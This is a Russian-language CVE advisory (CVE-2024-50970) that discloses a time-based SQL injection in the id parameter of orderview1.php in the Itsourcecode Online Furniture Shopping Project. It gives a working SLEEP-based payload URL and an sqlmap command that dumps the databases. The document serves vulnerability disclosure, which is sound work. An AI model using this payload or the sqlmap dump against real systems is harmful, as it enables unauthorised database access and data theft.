CVE-2024-50970
Описание
Уязвимость SQL-инъекции в файле orderview1.php проекта Itsourcecode Online Furniture Shopping Project 1.0 позволяет удалённым злоумышленникам выполнять произвольные SQL-команды через параметр id.
Тип уязвимости
SQL-инъекция
Производитель продукта
Itsourcecode
База кода затронутого продукта:
https://itsourcecode.com/free-projects/php-project/online-furniture-shop-in-php-projects-free-source-code-and-database/ – 1.0
Затронутый компонент:
Проект Itsourcecode Online Furniture Shopping v1.0 подвержен SQL-инъекции через параметр id на странице orderview1.php
Векторы атаки:
- Установите приложение локально, зарегистрируйте учётную запись и войдите в систему с помощью только что зарегистрированного аккаунта.
- Перейдите по следующему URL-адресу в вашем браузере:
http://localhost/nikos/orderview1.php?action=edit&id=1728835149
- Внедрите SQL-полезную нагрузку:
Измените параметр id в URL-адресе, включив в него time-based SQL-инъекцию.
http://localhost/nikos/orderview1.php?action=edit&id=1728835149+AND+(SELECT+2657+FROM+(SELECT(SLEEP(10)))DTmU)
- Наблюдайте за ответом приложения:
Страница должна загружаться заметно дольше (10 секунд) в случае успешной инъекции, что подтверждает уязвимость параметра id к SQL-инъекции.
- Теперь используйте инструмент SQLMap для дальнейшей эксплуатации и дампа баз данных с помощью следующей команды:
python sqlmap.py -u "http://localhost/nikos/orderview1.php?action=edit&id=1728835149" --cookie="PHPSESSID=your_cookie_here"--risk 3 --level 3 --dbs --technique=T --dump --no-cast
Ссылки:
- https://itsourcecode.com/free-projects/php-project/online-furniture-shop-in-php-projects-free-source-code-and-database/
- https://owasp.org/www-community/attacks/SQL_Injection